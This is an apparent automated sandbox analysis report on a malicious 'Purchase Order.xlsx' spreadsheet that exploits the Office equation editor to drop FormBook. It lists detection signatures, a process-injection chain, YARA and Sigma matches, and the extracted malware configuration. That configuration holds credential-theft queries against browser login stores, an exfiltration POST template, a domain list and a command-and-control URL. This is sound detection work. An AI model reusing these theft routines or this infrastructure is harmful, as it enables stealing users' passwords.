Loading ...

Play interactive tourEdit tour

Analysis Report Purchase Order.xlsx

Overview

General Information

Sample Name:Purchase Order.xlsx
Analysis ID:344798
MD5:568ad30c526d3950e00385f41e08cdf2
SHA1:a2599b55c9c9a6b39c019bfeda57b38654c72f48
SHA256:ae24343193734ee532e142a8e64a7f27d5faf33667a7818743fd91baca01f99b
Tags:VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
PE file contains an invalid checksum
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2304 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2564 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 260 cmdline: 'C:\Users\Public\vbc.exe' MD5: 40BFB08CE97F3709F4DE7C6BA8B3401E)
      • acqyswhf.exe (PID: 2864 cmdline: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p MD5: C56B5F0201A3B3DE53E561FE76912BFD)
        • dtz25z5e9sr.exe (PID: 2032 cmdline: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p MD5: 535DD1329AEF11BF4654B3270F026D5B)
          • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • autofmt.exe (PID: 3044 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: A475B7BB0CCCFD848AA26075E81D7888)
            • svchost.exe (PID: 3024 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
              • cmd.exe (PID: 2168 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x79f3", "KEY1_OFFSET 0x1bb41", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1bc3e", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1a6b3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa6e6bd38", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121d2", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "xwwgj.com", "release-paypal.com", "investorshighway.com", "maglex.info", "chenangopistolpermit.com", "thebihareye.com", "sanjosemasks.com", "foremanmotors.com", "stadtstreicherin.com", "9247pf.com", "erenvincplatform.xyz", "cushcaps.com", "flatisteam.com", "kojyouibennto.com", "rahmatsuparman.com", "vallyfades.online", "metropitstop.com", "shopasha.com", "windycitycreditsolutions.com", "uproxysite.com", "californiabilling.com", "theexgirlfriendpics.com", "arnoldnaturalresources.com", "gfeets.com", "streamelemeants.com", "academiadacocriacao.com", "nselife.com", "maratinsaat.info", "deviurg.com", "mrbalumba.com", "joyfinancialservices.com", "retriever-home.com", "paydayonlineloanapplication.com", "dchasers.net", "mct.ltd", "geisshaven.com", "mdejgqbp.icu", "mercifulhandshc.com", "bmtxm.com", "aulbalu.com", "globuswarming.com", "wolfpacktowingrecovery.com", "empireofconsciousness.com", "yosyoshop.com", "l7zexitam.xyz", "lendtitle.com", "charmedlifeinteriors.com", "aimtopshop.com", "teramareprime.com", "muenker.world", "just-embrace.com", "amazon-co-jp.world", "fsjinhua.net", "lungi.cloud", "mysinglecam.com", "hortenserolland.com", "grouptripinsurance.com", "aspiringeyephotos.com", "shoesiin.com", "oodi.club", "shakhriyarmamedyarov.com", "musiklotteriet.com", "germanystablecoin.com", "land-il.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.chuanxingtong.com/j5an/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.acqyswhf.exe.220000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.acqyswhf.exe.220000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.acqyswhf.exe.220000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158c9:$sqlite3step: 68 34 1C 7B E1
        • 0x159dc:$sqlite3step: 68 34 1C 7B E1
        • 0x158f8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
        • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
        5.2.acqyswhf.exe.220000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.acqyswhf.exe.220000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2564, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2564, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\scancopy87867678[1].exe
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2564, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2564, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2564, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260
          Sigma detected: Suspicious Svchost ProcessShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1388, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 3024
          Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1388, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 3024

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 5.2.acqyswhf.exe.220000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79f3", "KEY1_OFFSET 0x1bb41", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1bc3e", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1a6b3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa6e6bd38", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121d2", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeReversingLabs: Detection: 20%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Purchase Order.xlsxReversingLabs: Detection: 23%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\scancopy87867678[1].exeJoe Sandbox ML: detected
          Source: 5.2.acqyswhf.exe.220000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.1.dtz25z5e9sr.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.dtz25z5e9sr.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

          Compliance:

          barindex
          Uses new MSVCR DllsShow sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Uses secure TLS version for HTTPS connectionsShow sources
          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.22:49165 version: TLS 1.2
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: wntdll.pdb source: acqyswhf.exe, dtz25z5e9sr.exe, svchost.exe
          Source: Binary string: svchost.pdb source: dtz25z5e9sr.exe, 00000006.00000002.2204947224.00000000002C4000.00000004.00000020.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040659C FindFirstFileA,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004027A1 FindFirstFileA,
